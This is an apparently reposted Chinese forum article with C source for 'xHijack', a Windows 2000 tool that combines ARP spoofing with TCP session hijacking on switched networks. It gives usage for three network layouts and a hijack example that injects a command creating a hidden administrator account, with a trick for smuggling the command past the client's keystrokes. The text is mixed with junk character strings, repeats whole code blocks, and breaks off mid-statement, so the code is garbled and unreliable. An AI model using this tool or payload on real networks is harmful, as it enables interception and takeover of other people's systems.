再谈交换环境下的会话劫持(For windows2000)

韩冰

第一步是开启IP Routing的功能，修改注册表
' G! ]& e9 A  G9 [+ ~0 X: _HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter为0x1，重启系统即可。
6 Y8 j9 P' d) J* j8 [1 O第二步是ARP欺骗，具体原理我就不说了。
5 A0 k' K0 d7 _第三步就是开始劫持啦。
6 F: g/ h+ j( \# y
我写了个程序xHijack可以实现第二、三步功能，使用如下:

, h- g' a" Y2 H! Y. w& o% IUsage: xHijack ServerSide ClientSide
( ^0 A6 Y0 A0 g0 {% S" E
下面根据三种不同的情况分别说明如何输入参数：
<1>服务器、客户端、劫持者处于同一局域网，接在同一交换机上（或交换机级连？）。
假如服务器的IP是192.168.0.2，客户端的IP是192.168.0.3，提供如下参数给xHijack即可
: ~" p1 t' c; I7 b) ^c:\>xHijack 192.168.0.2 192.168.0.3
6 V$ k: k" q$ h/ O' }劫持前数据流程：server <--> client
: ~% X# F, S2 S  x劫持后数据流程：server <--> hijacker <--> client
: a. u2 I+ b+ `
<2>服务器、劫持者处于同一局域网，客户端处于别的网络。
假如服务器IP是202.202.202.2，服务器的网关是202.202.202.1，提供如下参数
xHijack 202.202.202.2 202.202.202.1
4 Z6 q/ p  h7 s3 b+ h! H4 f) k劫持前数据流程：server <--> gw <--> routes <--> client
4 ^* E* \5 z  K. G$ V! b5 `劫持后数据流程：server <--> hijacker <--> gw <--> routes <--> client
- p1 P2 R# B) F8 I8 I* Q' |' m
<3>客户端、劫持者处于同一局域网，服务器处于别的网络。
假如客户端的IP是192.168.0.2，网关是192.168.0.1，提供如下参数
xHijack 192.168.0.1 192.168.0.2
7 }4 b' G8 i5 A9 Z劫持前数据流程：client <--> gw <--> routes <--> server
0 |# ?( l# x* [9 u1 u5 E劫持后数据流程：client <--> hijacker <--> gw <--> routes <--> server
7 j+ t+ I% m( g" J
输入两个参数后，会提示你选择网卡，然后会提示
) I0 d. `4 x( T, h) p1 f; e  C7 ol        <-- List all connections
; }* z: Y! W. _r x       <-- Reset the number x connection
! a- l5 w" L' {w x       <-- Watch the number x connection
( M# b" |+ p6 O, }# C, L8 l9 eh x command   <-- Hijack the number x connection to execute command

list、reset、watch命令我就不解释了。
" ]/ Q1 p  _! H" n1 |假如现在有如下连接
4 C% X6 b, Q/ P7 H0 x) k2 M(1) 202.202.202.202:23 <--> 192.168.0.3:2345
( s" q% p9 e6 Y1 ?# Z我们想要劫持这个连接运行我们的命令，输入
xHijack>h 1 "&net user ey4s hijack /add & net localgroup administrators ey4s /add"
- `) a  C1 i6 n. o, B0 X为什么命令前面要加&呢？假如客户刚发送一个字符p过去，我们不加&的话，服务器端接受到的就是
9 {7 X/ B/ \  Z% Y" M; R: A) O" m9 s5 epnet user.....了，加了&后就成为p&net user.....，这样就不管前面客户输入了什么，我们的命令
都能够运行了。以上都假设服务器是windows 2000，unix下加什么字符，我不知道，我是unix白痴，呵呵。
) v* J3 i5 `2 }( j) c
劫持的流程如下：
5 h/ U- Y4 G* K9 V0 j/ Y<1>伪装成Server给Client发一个rst包
<2>伪装成Client给Server发了一个数据包
<3>Server回一个ACK包给client
<4>因为Cleint的连接已经给我们reset掉了，所以client回一个rst包给server

: m* L( c+ c  M这样的话，我们只能发一个伪造的包，但我想已经足够了。
( B& o+ _5 i) ~9 T, D: [! `想要一直劫持那个连接也可以，如下
0 v% r; l3 n% X. y  P<1>伪装成Server给Client发一个rst包
<2>欺骗Client，告诉它Server的MAC地址AAAAAAAAAAAA
<3>伪装成Client给Server发了一个数据包
<4>Server回一个ACK包给client
<5>Client回一个rst包给Server，但Server收不到，因为Client发到AAAAAAAAAAAA了，呵呵。
<6>然后Server发给Client的包都由我们来处理，包括给Server回ACK包等等。
! j5 S1 q5 f& a  H
* s( ^9 J) b  A2 z, [6 o) |不过这样比较危险，在我们劫持的过程中，Client与Server的通讯始终是断开的。


8 t5 V# D/ Q9 @  x3 {* o( \3 n刚开始看TCP/IP协议，调程序调得头昏脑涨，说明也写的乱七八糟，呵呵，程序代码也可能存在很多问题，
还请各位多多指点。
9 e) Z% Z: w2 o% a# p, d/ H
BTW:我没有空间，编译好的程序没地方放：（


* P* o4 t* P4 X+ K) I
& O; Y3 f1 c* B$ t" B; H参考资料
1 A8 P* Q  J% o! o( y<>交换环境下的会话劫持http://www.xfocus.net/article_view.php?id=375
  C& ^" u- ^" s<>交换网络中的嗅探和ARP欺骗http://www.xfocus.net/article_view.php?id=377


' O8 }+ N% F/ p* w- e以下是程序代码
----------------------------------------------------------------------
1 F5 p9 R  d# ]7 I: R/ _/*-----------------------------------------------------------------------------
; Z' X  A$ Q# n: n3 H( mFile      : xHijack.c
Version      : 1.0
Create at    : 2002/8/12
Last modifed at  : 2002/8/19
( B; c$ \- _9 I1 `7 {" \, j1 cAuthor      : eyas
) A  W, b- ^" uEmail      : ey4s@21cn.com
, o1 A* N0 R2 o8 NHomePage    : www.ey4s.org
* n$ [/ B2 t$ s5 [$ K  ^感谢refdom和shotgun发布的源代码，使我获益非浅。
0 s0 _% p, y  M6 e7 vIf you modify the code, or add more functions, please email me a copy.
& s6 K7 H, X: x) u+ [( ?
备注:
<>没有考虑IP头、TCP头超过20字节的情况
) V7 X- w0 a. T) H/ M<>没有考虑数据包分片的情况
, Y/ r* t! \' }1 @. G; p) s<>没有对截取到的TCP数据进行解码，如TELNET，虽然是明文传输，但是TCP数据里面包含了
显示格式、位置等信息，直接打印出来，显得很凌乱。但如果是IRC、SMTP、POP3等就没问
题了。
+ a& d$ t! c. y  y( ]' Y2 {
7 p7 h9 Q; w' n2 W+ M也许下一版本会修正这些问题，也许不会有下一版本了。
$ k0 n; e3 X7 M+ p  Y, J
-----------------------------------------------------------------------------*/
+ K$ L- Q/ x/ v, \) E#include
#include
3 E# a$ M4 P6 [: A/ h1 @#include
" N4 Q+ f$ p6 u4 d# s& ?. X#include
# ?  w6 ]: t- v, X) Q% d9 [0 N#include
: h" ~- A' A0 v: b: o' q  Q$ r5 F* _#include
#include
* e% h  f* H: q8 t! E
#pragma comment (lib, "packet")
2 @0 j  b" s, g+ ~. w$ L# C/ H, w#pragma comment (lib, "iphlpapi")
' ^. _7 o$ B- U! \% b4 C6 I* X#pragma comment (lib, "ws2_32")

$ X) E, c- ?3 Z9 b% o#define Max_Num_Adapter 10
#define Max_Num_IPAddr  5
& h5 ^% y% K5 B. h! u+ E/ i#define EPT_IP      0x0800      /* type: IP  */
#define ARP_HARDWARE  0x0001      /* Dummy type for 802.3 frames */
#define EPT_ARP      0x0806      /* type: ARP */

#define  ACTION_NONE    0
#define  ACTION_WATCH  1
#define  ACTION_RESET  2
#define ACTION_HIJACK  3

/*以1字节对齐*/
; [  e$ a9 b! O( t8 l#pragma pack(1)
typedef struct _ehhdr
& E# |& A% e3 t- q* L{
  unsigned char  DestMAC[6];
  unsigned char  SourceMAC[6];
  unsigned short  EthernetType;
: n% L7 r# C# s+ `}EHHDR, *PEHHDR;
  c- C) Y5 Q0 P) I, \! K
# e0 y* r9 E" M9 Y  Ktypedef struct _iphdr        //定义IP首部
{
  unsigned char h_verlen;      //4位首部长度,4位IP版本号
# a; g: s# J+ x9 Y2 ]7 o  unsigned char tos;        //8位服务类型TOS
# R* q$ |, t; C. P# z3 G/ Z0 @  unsigned short total_len;    //16位总长度（字节）
  unsigned short ident;      //16位标识
* W, \7 O- W+ d0 Z* P  unsigned short frag_and_flags;  //3位标志位
  unsigned char ttl;        //8位生存时间 TTL
  unsigned char proto;      //8位协议 (TCP, UDP 或其他)
  unsigned short checksum;    //16位IP首部校验和
* k6 b) g* K2 V8 K  unsigned int sourceIP;      //32位源IP地址
3 s. M* n4 d2 f* f# e6 R- A  unsigned int destIP;      //32位目的IP地址
}IPHDR, *PIPHDR;

typedef struct _tcphdr        //定义TCP首部
{
  USHORT th_sport;        //16位源端口
  USHORT th_dport;        //16位目的端口
  unsigned int th_seq;      //32位序列号
  unsigned int th_ack;      //32位确认号
$ M+ F: U' n* P% {! g  unsigned char th_lenres;    //4位首部长度/6位保留字
  unsigned char th_flag;      //6位标志位
) T& E4 M4 a6 H3 f  USHORT th_win;          //16位窗口大小
  USHORT th_sum;          //16位校验和
  USHORT th_urp;          //16位紧急数据偏移量
}TCPHDR, *PTCPHDR;

. a' e7 v( @7 J+ Dtypedef struct _psdhdr        //定义TCP pseudo header
{               
7 o0 W' v: _: ]. U' n6 [  unsigned long saddr;
1 ^0 g+ B/ m; \% z  unsigned long daddr;
! x9 P! A3 g8 z% e* U  char mbz;
' r  n4 E3 I7 y& |! F  char ptcl;
/ z1 C- A" w' T6 u* @  unsigned short tcpl;
}PSDHDR, *PPSDHDR;
& a- e  d  m" e% w1 s1 E. g
typedef struct _arphdr
3 ~; [; E7 U4 N+ D9 X, g{
  Z* \1 B' k6 k9 V. r" {  unsigned short  HrdType;//硬件类型
- k. n2 K1 o& V# `# C# @  unsigned short  ProType;//协议类型
9 j7 x* m  k' C6 D  unsigned char  HrdAddrlen;//硬件地址长度
0 e5 F9 {& x. F! L9 _, y2 M: r  unsigned char  ProAddrLen;//协议地址长度
  unsigned short  op;//operation
, J6 S1 T# C+ {7 d: a  unsigned char  SourceMAC[6];/* sender hardware address */
  unsigned long  SourceIP;/* sender protocol address */
  unsigned char  DestMAC[6];/* target hardware address */
8 y7 t' p0 U( }5 J  p7 B; t: G  unsigned long  DestIP;/* target protocol address */
  m$ K$ S8 _# U8 o$ E9 P2 V# P6 ?0 }}ARPHDR, *PARPHDR;

& m8 P, f- l) c5 J; P0 b- C7 z& stypedef struct _ArpPacket
! M: i3 J( x9 J( E- o4 o' D/ z! s{
  EHHDR  ehhdr;
& n- i( i+ U' M7 V  ARPHDR  arphdr;
9 [+ \1 ~' p$ ]}ARPPACKET, *PARPPACKET;

2 u7 W+ }4 A$ u0 mtypedef struct _tcppacket
6 A' t! W. t7 H& Z5 P$ {{
6 T0 v3 G/ N4 L+ U- Z9 v5 |  EHHDR  ehhdr;
  IPHDR  iphdr;
- O8 M3 R/ a! ]% y- @/ E, B3 ]& P( m  TCPHDR  tcphdr;
6 V" b3 |1 D+ Z  Z5 U% u}TCPPACKET, *PTCPPACKET;
& L3 @, H! P9 E' h! [& Z
$ c+ E2 @; r, J. m+ B# xtypedef struct _conninfo
( T' j: F% E1 \5 W( C{
  DWORD  dwServerIP;
  USHORT  uServerPort;
  DWORD  dwClientIP;
8 {% ^1 {3 I3 A5 C, i8 @  USHORT  uClientPort;
. J# t5 R6 `) R  [# b  DWORD  ident;//标识
/ i! R9 K5 r5 j9 e4 [+ d+ y5 k+ k  BOOL  bActive;
  struct  _conninfo  *Next;
- H4 @& g8 E- v) S% V}CONNINFO, *PCONNINFO;
+ c2 h, B. z9 S! _# Q/ L
1 Q9 P7 D2 @4 ?5 a  y; _$ n//定义全局变量

韩冰

unsigned int  g_ServerSideIP,
, K6 g% g& G4 ~8 J( ~        g_ClientSideIP,
        g_OwnIP[Max_Num_IPAddr],//本机IP地址列表
        g_TotalIP = 0;//
unsigned char  g_szOwnMAC[6];//本机MAC地址
. `# }( z; h( z+ u- j8 C3 t1 R; ounsigned char  g_szClientSideMAC[6];
" t1 j; a" A5 v) Y7 tunsigned char  g_szServerSideMAC[6];
char      g_szTcpFlag[6] = {'F','S','R','P','A','U'};//TCP标志位
LPADAPTER    g_lpAdapter;
2 Q0 |" D' r- d" a//1 and 2 is arp spoof thread, 3 is recv packets thread, 4 is interface thread
$ }# z6 r  _1 U) F; eHANDLE      g_hThread[4];
3 z$ @3 O) s7 @% W5 Pchar      g_szCommand[128];//command to execute after hijack
9 c! i9 W( x1 IDWORD      g_dwAction;//action type
% n+ @/ [, q8 z0 U# u( i. tDWORD      g_dwCtrlConn;//action 所控制连接的标识
DWORD      g_ident;//节点标识，递增
PCONNINFO    g_pCurrCtrlConn = NULL,//action当前所控制的连接的信息结构指针
$ w. d0 i& h) T, Y; a2 n        g_pConnHead = NULL,
        g_pConnLast = NULL;
- k! x* E: H# e. |, o1 ^' ?# Jchar      g_szSendPacketBuf[1514];
LPPACKET    g_lpSendPacket;
7 e' s1 T% _  Y1 v/ u, `! K//函数
+ m9 O5 ~+ q- B4 h/ U- kvoid      usage(void);
void      ShowPacketMoreInfo(PTCPPACKET, USHORT, BOOL);
/ Z$ ?" S8 N! V1 o8 N* v. a8 Ivoid      ListAllConnection();//列出当前所有的连接
void      ResetActionAllFlag();
$ _8 [) O0 }1 YUSHORT      checksum(USHORT *, int);
3 H3 v! \0 ^) X; `4 b' ^! v2 r6 hBOOL      GetMACAddr(DWORD DestIP, char *pMAC);//取得目标IP的MAC地址
- I) l. l& r: g5 eBOOL      IsACKPacket(unsigned char);//判断是不是一个纯ack包
( _1 L/ {9 h3 ^1 O: o0 B  r+ V4 V/ _0 JLPADAPTER    InitAdapter();//初始化一些参数和全局变量
7 a, C4 I  {& B" U: P' S$ L! y" ZBOOL      SendRstPacket(unsigned int, unsigned int);//伪装成server给cilent发送rst包
( m8 J+ e! U8 p' PBOOL      SendHiJackPacket(PTCPPACKET);//伪装成client给server发送我们的包
DWORD      GetConnNum(char *, DWORD, DWORD *);
% n: T, Q) v7 w+ N3 {% \/ o$ GDWORD      CtrlConnInfoLink(DWORD, USHORT, DWORD, USHORT, BOOL, BOOL);
DWORD  WINAPI  ArpSpoofThread(LPVOID);//进行arp欺骗的函数
' Z5 E' M+ k3 g0 D" L% DDWORD  WINAPI  AnalysePacketsThread(LPVOID);//分析处理接收到的包
DWORD  WINAPI  InterfaceThread(LPVOID);//
. R( A) x* ~8 C3 |* j. o1 bBOOL  WINAPI  CtrlEvent(DWORD);

% W4 n) m% _' P1 `$ ]# D

int main(int argc, char **argv)
8 ~* N) ?* G! f* [( x1 A{
6 v7 v* ?7 x( G" O7 o8 ?  struct    bpf_stat stat;
  `2 p9 \4 }$ W; }0 W6 ]: t( R  int      i;

  usage();
  if (argc != 3) return 0;
) \. W/ ?; }. h) H0 d: o  //取得参数
/ n; P( T% M& U0 z' G1 F. L. n  O4 A  g_ServerSideIP = inet_addr(argv[1]);
7 r3 u/ F7 p3 H  g_ClientSideIP = inet_addr(argv[2]);
  //初始化adapter & 一些全局变量
  g_lpAdapter = InitAdapter();
  if(!g_lpAdapter) return 0;
  //get ServerSide MAC & ClientSide MAC
  if(!GetMACAddr(g_ServerSideIP, g_szServerSideMAC)) return 0;
7 l, r* A9 N* t0 W  if(!GetMACAddr(g_ClientSideIP, g_szClientSideMAC)) return 0;
9 I  v, w  g/ [& c$ ~. b$ u  //create arp spoof thread     
- _. N9 j+ @/ f: b/ \  i = 1;
' c  V8 D8 v' u  g_hThread[0] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
& P# _/ U* }( V- J& n; q# Q. G' i- L  Sleep(500);
4 C# J8 S2 l0 j  i = 2;
  g_hThread[1] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
  //create analyse packet thread
  g_hThread[2] = CreateThread(0, 0, AnalysePacketsThread, NULL, 0, 0);
1 m1 f# [7 q/ |0 }3 O  //create interface thread
  g_hThread[3] = CreateThread(0, 0, InterfaceThread, NULL, 0, 0);
, j* D! M8 Z& X" E4 m. k  //set console ctrl handle
  if(!SetConsoleCtrlHandler(CtrlEvent, TRUE))
0 f7 @8 R  i2 {' g8 W  `# n  {
9 K- v$ o( [( T+ D. |1 c    printf("SetConsoleCtrlHandler error:%d\n", GetLastError());
    return 0;
0 _4 {% ~- w" Q9 ^- R  }
$ M, H* f( P' _2 {* {, j  //wait for any thread exit
  WaitForMultipleObjects(4, g_hThread, FALSE, INFINITE);
  //print the capture statistics
5 _3 _. g( f; D0 k  if(PacketGetStats(g_lpAdapter, &stat) == FALSE)
; n& [; G. S5 @# I3 F3 u7 U    printf("Warning: unable to get stats from the kernel!\n");
& H+ ?3 Z, K7 x  else
    printf("\n\n%d packets received.\n%d Packets lost\n",stat.bs_recv,stat.bs_drop);
  //free resource   
  PacketFreePacket(g_lpSendPacket);
  PacketCloseAdapter(g_lpAdapter);
  return 0;
  F$ U! f1 R1 p0 d5 M7 @; E6 W4 e}

* v  C- Z7 Y0 H0 R  p//
//功能：重置所有于ACTION有关的标志
" P1 x- G4 t9 s//

韩冰

unsigned int  g_ServerSideIP,
        g_ClientSideIP,
3 E6 }& Y# p% r- c        g_OwnIP[Max_Num_IPAddr],//本机IP地址列表
! N0 {2 s6 h2 w$ _% t        g_TotalIP = 0;//
unsigned char  g_szOwnMAC[6];//本机MAC地址
7 P& l  T- i% A$ z, {unsigned char  g_szClientSideMAC[6];
unsigned char  g_szServerSideMAC[6];
char      g_szTcpFlag[6] = {'F','S','R','P','A','U'};//TCP标志位
LPADAPTER    g_lpAdapter;
/ t6 V7 d! l' R, r* ~* O//1 and 2 is arp spoof thread, 3 is recv packets thread, 4 is interface thread
HANDLE      g_hThread[4];
char      g_szCommand[128];//command to execute after hijack
DWORD      g_dwAction;//action type
3 M- O" t9 y( V6 ]1 i3 X6 ~DWORD      g_dwCtrlConn;//action 所控制连接的标识
DWORD      g_ident;//节点标识，递增
PCONNINFO    g_pCurrCtrlConn = NULL,//action当前所控制的连接的信息结构指针
        g_pConnHead = NULL,
        g_pConnLast = NULL;
" x) y  C- Y" L/ o- Kchar      g_szSendPacketBuf[1514];
3 G" @2 d0 `5 f) `1 C/ r8 Y, ]LPPACKET    g_lpSendPacket;
//函数
void      usage(void);
# b  V0 G  T2 n) P  g$ Pvoid      ShowPacketMoreInfo(PTCPPACKET, USHORT, BOOL);
void      ListAllConnection();//列出当前所有的连接
void      ResetActionAllFlag();
USHORT      checksum(USHORT *, int);
BOOL      GetMACAddr(DWORD DestIP, char *pMAC);//取得目标IP的MAC地址
/ F* r$ E- s/ S7 h# W! }BOOL      IsACKPacket(unsigned char);//判断是不是一个纯ack包
" k5 Q4 q) I) p# w0 H& }, ~LPADAPTER    InitAdapter();//初始化一些参数和全局变量
; x2 }* g) `9 q6 j+ W# M0 }1 _BOOL      SendRstPacket(unsigned int, unsigned int);//伪装成server给cilent发送rst包
BOOL      SendHiJackPacket(PTCPPACKET);//伪装成client给server发送我们的包
+ C# y; p0 C. d# v$ U' `5 R  NDWORD      GetConnNum(char *, DWORD, DWORD *);
$ v7 C. d( f( {& t7 E8 P* }- X+ XDWORD      CtrlConnInfoLink(DWORD, USHORT, DWORD, USHORT, BOOL, BOOL);
/ s. {& J7 d' U& K2 ]; B7 F! YDWORD  WINAPI  ArpSpoofThread(LPVOID);//进行arp欺骗的函数
DWORD  WINAPI  AnalysePacketsThread(LPVOID);//分析处理接收到的包
. y" |% _3 e) {/ R1 V# Z. kDWORD  WINAPI  InterfaceThread(LPVOID);//
  h4 r. ?4 o2 sBOOL  WINAPI  CtrlEvent(DWORD);
( E: m( ^3 K0 |* i  E4 ?6 c, \: G
  F- n' B) h- L( m: y* Q+ }
5 \0 g0 W, C  }# J1 e/ u- \8 Y  J8 d
. c, w  E2 A4 o8 Fint main(int argc, char **argv)
$ |  w# @; i* x7 A- o- x4 W{
% W% ^# [  [5 T% v  struct    bpf_stat stat;
: _$ D* ?; X9 n- d, Z  int      i;

4 L( h. g7 O& }& d# m  I. Z2 u1 j  usage();
' d0 W5 w; Z% q. v" S  if (argc != 3) return 0;
  //取得参数
  g_ServerSideIP = inet_addr(argv[1]);
  g_ClientSideIP = inet_addr(argv[2]);
  //初始化adapter & 一些全局变量
+ q4 I# X2 f  h0 g8 h5 c  g_lpAdapter = InitAdapter();
. f* S1 t0 @  M' U3 m" Q9 y  if(!g_lpAdapter) return 0;
$ l, z' q/ a" }+ z5 S( T  q  //get ServerSide MAC & ClientSide MAC
  if(!GetMACAddr(g_ServerSideIP, g_szServerSideMAC)) return 0;
; J* S$ E: s* l4 L# M  if(!GetMACAddr(g_ClientSideIP, g_szClientSideMAC)) return 0;
  //create arp spoof thread     
8 c" @5 L0 k  V: o( A& a7 N6 }  m  i = 1;
- Z3 R2 [* |& A  `  g_hThread[0] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
' Q: @2 y7 y' C0 L* o- E: {) d  Sleep(500);
  i = 2;
+ a, Z; n! E3 M! D) j& m  g_hThread[1] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
5 }: N$ m) c; |# {  //create analyse packet thread
  g_hThread[2] = CreateThread(0, 0, AnalysePacketsThread, NULL, 0, 0);
/ I% R2 A$ o. d  x  //create interface thread
9 l- {$ d; d/ d; f( @- d7 o  g_hThread[3] = CreateThread(0, 0, InterfaceThread, NULL, 0, 0);
: x' y9 ]$ K" r1 V  v  \  //set console ctrl handle
- _8 W( p- ^( L; p  if(!SetConsoleCtrlHandler(CtrlEvent, TRUE))
8 B: k  f, M& x. X  {
    printf("SetConsoleCtrlHandler error:%d\n", GetLastError());
( |/ E9 K! O) j) P# Z/ n/ j6 E' D    return 0;
  }
; ^' Y) ]: ^$ x+ u4 a) r1 Y  //wait for any thread exit
- X# E3 x) F% ?8 O1 F* c; C  WaitForMultipleObjects(4, g_hThread, FALSE, INFINITE);
1 g+ k# ]6 B1 Z8 t1 m" d  //print the capture statistics
6 E$ ^0 S0 z$ w5 w  if(PacketGetStats(g_lpAdapter, &stat) == FALSE)
+ P1 @$ H- l5 n    printf("Warning: unable to get stats from the kernel!\n");
+ m) \; p& M' ^: e: c  else
    printf("\n\n%d packets received.\n%d Packets lost\n",stat.bs_recv,stat.bs_drop);
* s: U$ @7 b' a% u( c5 i+ ~$ g* U# {  //free resource   
  PacketFreePacket(g_lpSendPacket);
  PacketCloseAdapter(g_lpAdapter);
  return 0;
}
4 u/ I) T( G# G6 ^/ z& v
//
//功能：重置所有于ACTION有关的标志
$ Y" W8 X3 y: C) R5 o//

韩冰

void ResetActionAllFlag()
{
  g_dwCtrlConn = 0;
  g_pCurrCtrlConn = NULL;
1 f. D, P" q. k1 _# P4 F  g_dwAction = ACTION_NONE;
% M$ Y' q  I: u' b+ j}
% z/ H8 V% |7 ?6 F3 b" s
//
4 k$ b- F3 Y% E+ M* T3 m//功能：处理Ctrl+C和Ctrl+Break事件
5 f" A2 R2 \. @4 K1 F# I0 P1 g//
5 u9 y7 M+ S) k1 ]8 I% K, F5 sBOOL WINAPI CtrlEvent(DWORD dwCtrlType)
{
  switch(dwCtrlType)
  {
* v+ }! @" J% x/ e* |+ |    case CTRL_BREAK_EVENT:
      //reset action all flag
! q7 L6 K1 b: r" q: F  L' Q0 r4 A8 Q      ResetActionAllFlag();
1 c( M  S, {9 i) M3 ]. B1 J      break;
    case CTRL_C_EVENT:
      //terminate all thread
      TerminateThread(g_hThread[0], 0);
) Q7 Q% }6 s0 o2 x3 }      TerminateThread(g_hThread[1], 0);
) y1 @( i0 E8 S: {: K      TerminateThread(g_hThread[2], 0);
8 \4 p; _1 g4 k      TerminateThread(g_hThread[3], 0);
3 [. e6 F4 E5 A' c* C( i      break;
  t( R7 V1 l$ O9 W    default:
; A: x! O9 c& F      break;
  }
3 Y- ?! g6 e- W  return TRUE;
8 X0 T6 c- Q# t1 m}

; h  ?0 R" H; _//
( B. \  k2 x1 u& }//功能：处理用户输入
$ `' R2 L( N7 }: C8 _, {( G//
+ B; h5 u* x3 N* G2 ^$ }DWORD GetConnNum(char *szStr, DWORD dwLen, DWORD *lpCommandPos)
{
  DWORD  i;
* F% t0 r8 @/ G1 K: y- V  char  szBuff[16];
: p5 g" X: f' P3 A3 r/ `' n
9 O; D. S! L+ X  *lpCommandPos = 0;
  for(i=0; i<15, i代码比较乱
- A4 N+ M6 L4 n# q# {; p0 _+ L: P3 Y//
- |; ?; {* _, s3 f; q; HDWORD WINAPI InterfaceThread(LPVOID lp)
{
  char  szHelp[] =  "l\t\t<-- List all connections\n"
- j& r0 v; L8 V6 v5 b            "r x\t\t<-- Reset the number x connection\n"
" G, s2 w5 g. m5 w            "w x\t\t<-- Watch the number x connection\n"
6 Z. K* p. y9 y; T( ]            "h x command\t<-- Hijack the number x connection to execute command\n"
            "[Note]\n"
' }& I9 d" ?, I& A$ R( O$ |& [            "Ctrl+Break to clear all action\n"
            "Ctrl+C to exit\n";
/ L$ o$ q: G' i1 V- L  char  szPrompt[] = "\nxHijack>";
$ M* `6 j# d# C/ d+ ]  char  szBuffer[128];
* m  x: a: \7 b. A6 G! O! |  DWORD  dwPos;
  PCONNINFO  pTmp;
4 L6 R. p; j  a; F
  while(1)
  {
    gets(szBuffer);//不考虑buffer overflow
    switch(szBuffer[0])
    {
      case 'l':
: E( a4 K/ D' z, q' r. W      case 'L':
        ListAllConnection();
! w+ K# ~% |- u        break;
% u6 [  [1 D) `      case 'r':
! L" v! h6 X. h+ l5 o% M* H  W( `      case 'R':
1 j# h) @0 D( p3 T% L- M( l& U        if(strlen(szBuffer) >2)
& t+ J0 c! }5 b' F" i        {
          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
          g_dwAction = ACTION_RESET;
; |2 K2 o1 x9 p* }; U0 p        }
4 `& L7 v1 ^. m! h        else printf("%s", szHelp);
        break;
      case 'w':
      case 'W':
        if(strlen(szBuffer) > 2)
        {
          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
          g_dwAction = ACTION_WATCH;
        }
        else printf("%s", szHelp);
/ H0 a1 L, U; S9 s7 T        break;
      case 'h':
; X7 Z1 w( u9 H0 A5 R      case 'H'://h 1 xxx
4 B4 o4 ?6 ]% w+ ]+ ]        if(strlen(szBuffer) > 5)
        {
- x% O( K) G7 K7 T7 G/ p          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
; E' @7 n2 ?$ `          //如果command第一个字符是'或"
          if( (szBuffer[2+dwPos+1] == '\'') || (szBuffer[2+dwPos+1] == '\"') )
5 `( l1 e2 \, \; ?: D          {
            strncpy(g_szCommand, &szBuffer[2+dwPos+1+1], sizeof(g_szCommand) - 3);
, F0 t7 R) N0 r; |) ?            g_szCommand[strlen(g_szCommand) - 1] = 0x0;//去掉最后一个'或"
          }
          else strncpy(g_szCommand, &szBuffer[2+dwPos+1], sizeof(g_szCommand) - 3);
3 w+ c5 R9 D; D" U! V          strcat(g_szCommand, "\x0D\x0A");
% t/ h& M8 @, V. @0 o          g_dwAction = ACTION_HIJACK;
        }
        else printf("%s", szHelp);
        break;
      default:
        printf("%s", szHelp);
        break;
7 q* p4 m. c7 S    }//end of switch
    //find the specify ident's struct point
- m" O% G7 ]; l1 X( |3 `3 v    if( (g_dwCtrlConn) && (g_dwAction) )
    {
      g_pCurrCtrlConn = NULL;
1 O3 E' W6 u' M, `- g      pTmp = g_pConnHead;
      while(pTmp)
      {
# z% N* ^% _! j, G! A9 V8 ~' J; ?        if((pTmp->ident == g_dwCtrlConn) && (pTmp->bActive) )
& Z: C5 F) A  a8 B4 s* N        {
  V+ z3 ~" `# g$ F          g_pCurrCtrlConn = pTmp;
          break;
        }
+ o( r  n6 i/ L3 A/ |0 J* i        pTmp = pTmp->Next;
8 d1 I2 [' J) D: A8 C; [% W      }
      if(!g_pCurrCtrlConn)
& \( q5 J# O- v$ t/ z; s  I# e; c      {
        printf("Can't find the number %d connection.\n", g_dwCtrlConn);
( Q& N8 ?. ~" Y/ y        //reset action all flag
4 k7 q, D2 I. e) {* F5 J! l! Z        ResetActionAllFlag();      
- X% Z# X8 e- b  v. s" }      }
' `, k; |: o$ X6 K    }
- B& v' @% m0 n" ^8 p  @5 f8 U    if(!g_dwCtrlConn) ResetActionAllFlag();
- M6 _8 G( b4 w3 |4 `+ C    //显示当前用户所期望的动作
1 I, \3 Y- L1 z# p0 M. t    printf("\nCurrentAction:");
: V( e& a: `! y5 A    switch(g_dwAction)
; y+ p1 T7 v# F' A    {
      case ACTION_WATCH:
        printf("ACTION_WATCH");
/ l6 w6 O; ^3 M! y& X2 w& _        break;
      case ACTION_RESET:
0 M/ @7 L8 I" v        printf("ACTION_RESET");
        break;
      case ACTION_HIJACK:
7 \# n+ w3 \3 a5 [/ `        printf("ACTION_HIJACK");
        break;
# m  y0 G+ {# M# m, _2 A, g      default:
        printf("ACTION_NONE");
        break;
) l0 j; J$ H0 G    }
4 {  v: \' N0 n+ x    printf("\tCurrentCtrlConn:%d%s", g_dwCtrlConn, szPrompt);
  }//enf of while
  return 0;
7 ~: W" r" t7 U: t1 l7 ]# N}

韩冰

// //功能：列出当前所有连接 $ \3 @# B0 a) K/ Y# \: c t+ u6 h// 7 T2 M2 I/ D; evoid ListAllConnection() { PCONNINFO pTmp; / D2 K3 @* r) \3 U3 b0 S SOCKADDR_IN saDest, saSource; 9 T- \* Q3 H. ]* { pTmp = g_pConnHead; while(pTmp) { 3 W6 W7 M' Q; ^ if(pTmp->bActive) { saSource.sin_addr.s_addr = pTmp->dwServerIP; saDest.sin_addr.s_addr = pTmp->dwClientIP; - Z6 F2 Z6 w5 y. E0 Q# w0 y" ? printf("(%d) %s:%d <--> ", pTmp->ident, inet_ntoa(saSource.sin_addr), ntohs(pTmp->uServerPort)); printf("%s:%d\n", inet_ntoa(saDest.sin_addr), ntohs(pTmp->uClientPort)); } : }+ C* Q5 b) V9 M! _ pTmp = pTmp->Next; } } 3 R+ d0 t% n$ @+ Q9 e // + J/ L/ A: d1 i% L' Y* [//功能：初始化一些数据，取得指定网卡的MAC地址和所有IP地址 // ( ]+ `7 _: A6 b- O, ~LPADAPTER InitAdapter() K- V7 ], k; D2 Z1 j{ LPADAPTER lpAdapter; static char AdapterList[Max_Num_Adapter][1024]; 1 }% d6 Y. @& |( T char szSelectAdapterName[512]; & ]& h4 w1 ]" S1 e. T1 D: K WCHAR AdapterName[2048]; WCHAR *temp,*temp1; * t0 W; 